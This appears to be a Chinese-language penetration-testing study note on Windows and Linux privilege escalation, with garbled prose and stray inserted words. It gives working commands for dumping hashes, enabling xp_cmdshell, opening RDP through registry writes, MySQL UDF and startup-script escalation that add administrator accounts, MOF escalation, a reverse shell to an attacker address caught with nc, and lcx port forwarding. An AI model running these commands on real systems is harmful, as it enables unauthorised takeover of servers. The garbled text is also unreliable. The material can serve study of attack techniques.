渗透测试学习 二十5、提权 下

溢出提权php

         主要是经过Windows漏洞利用来获取系统权限mysql

         常见的溢出提权web

         巴西烤肉sql

         prshell

         步骤:数据库

         一、经过信息搜集查看服务器打了哪些补丁windows

         二、根据未打的补丁漏洞进行利用便可安全

 

破解hash提权服务器

         上传pwdump.exe远程获取hash值ide

         拿到lc5彩虹表破解

         便可获得管理员密码

         须要管理员权限方可执行读取hash操做

 

启动项提权

         前提写入的目录须要写入权限

         将批处理文件上传到开机启动项目录等待管理员重启便可

 

数据库提权

         SQLserver数据库提权

         mysql数据库提权

         须要具有数据库管理员权限才能够执行提权操做

        

msSQL提权

         安装组件

         开启3389

         建立用户

         提高权限

         完成

         sa帐号的获取,查看config.asp、conn.asp等文件

 

msSQL安装执行命令组件

         安装cmd_shell组件

         exec sp_configure ‘show advanced options’, 1

         go

         reconfigure

         go

         exec sp_configure ‘xp_cmdshell’, 1

         go

         reconfigure

         go

 

3389操做语句

         开启3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--

 

         关闭3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--

 

删除cmd_shell组件

         exec sp_configure ‘show advancer options’, 1

         go

         reconfigure

         go

         exec sp_configure xp_cmdshell; 0

         go

         reconfigure

         go

 

mysql数据库提权

         udf提权

         启动项提权

         maf提权

         反链端口提权

 

udf提权

         获取到对方的mysql数据库下的root帐号密码

         一、查看网站源码里面数据库配置文件

         (inc、conn、config.sql、common、data等)

         二、查看数据库安装路径下的user.myd(/data/mysql)

         三、暴力破解mysql密码,破解3306端口入侵

udf提权原理

         经过root权限导出udf.dll到系统目录下,能够经过udf.dll调用执行cmd

c:\winnt\udf.dll 2000

c:\windows\udf.dll 2003

如今基本上win的服务器就这两个导出udf.dll

5.1以上版本须要导出到mysql安装目录lib\plugin\

create function cmdshell returns string soname ‘udf.dll’

select cmdshell (‘net user abc abc /add’);

select cmdshell (‘net localgroup administrators abc /add’);

drop function cmdshell; 删除函数

 

启动项提权

         一、查看咱们进入数据库中有什么数据表

         mysql>show tables;

         默认状况下,test中没有任何表的存在

         如下为关键部分

         二、在TEST数据库下建立一个新的表

         mysql>create table a (cmd text);

         此时建立了一个新表,表名为a,表中只存放一个字段名为cmd的text文件

         三、在表中插入内容

         mysql>insert into a values (“set wshshell=createobject(“”wscript.shell””)”)

  mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);

  mysql>insert into a values (“b=wshshell.ru (“”cmd.exe /c net localgroup administrators 1 /add”,0)”);

  注意,双引号和括号以及后面的“0”必定要输入,用这三条命令来创建一个VBS的脚本程序。

  四、mysql>select * from a;

  此时表中有三行数据,就是前面的VBS的脚本程序

  五、输出表为一个VBS的脚本文件

  mysql>select * from a into outfile “c://document//administrator//[开始]菜单//程序//启动//a.vbs”;

  六、重启

 

mof提权

         第一种方法:

         上传mof.php

         输入相关信息,执行命令,提权

         第二种方法:

         上传x.mof

         使用select命令导出到正确位置

         select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’

         容许外部地址使用root用户链接的SQL语句

         grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;

 

反链端口提权

         利用mysql客户端工具链接mysql服务器,而后执行如下操做

         一、执行命令

         mysql.exe –h 172.16.10.11 –uroot –p

         enter password:

         mysql>\.c”\mysql.txt

         mysql>select backshell(“yourip”,2010);

         二、本地监听反弹的端口

         nc.exe –vv –l –p 2010

         成功后,会得到一个system权限的cmdshell

 

内网端口转发

         内网主机输入命令

         lcx.exe –slave 外网ip 外网端口 内网ip 内网端口

         lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389

         外网主机输入命令

         lcx.exe –listen 111 1311

         开启3389

         使用

         批处理文件开3389

         使用sql语句开3389

         使用exe开3389

         使用vb开3389

 

一些命令的利用

         type E:\wwwroot\web.config 查看文件内容

         cacls命令

         /T:更改当前目录及其有子目录中指定的acl

         /E:编辑acl而不替换

         /C:在出现拒绝访问错误的时候继续

         /G Userver:perm:赋了指定用户访问权限,perm表明不一样级别的访问权限,其值能够是R(读),W(写),C(该),F(安全控制)等

/R user:撤销指定用户的访问权限,注意该参数仅在与“/E”一块儿使用的时候有效

  要修改一个文件的权限必要条件

  要有USERS组的彻底控制权限

  cmd权限

 

Linux提权

         内核溢出提权

         mysql ndf提权

         利用SUID提权

         利用环境变量,劫持该劝的程序提权

 

内核溢出提权

         查看内核

         uname –r

         反弹shell执行命令

         上传exp

         编译

         执行

         根据内核版本查找对应的漏洞

         收集exp

         能够从www.exploit-db.com查找漏洞利用

 

mysql udf提权

         上传库文件

         执行库文件建立命令执行函数

        

利用SUID提权

         寻找系统里能够用的SUID文件来提权

         $find /-perm –u=s –type f 2>/dev/null

相关文章
相关标签/搜索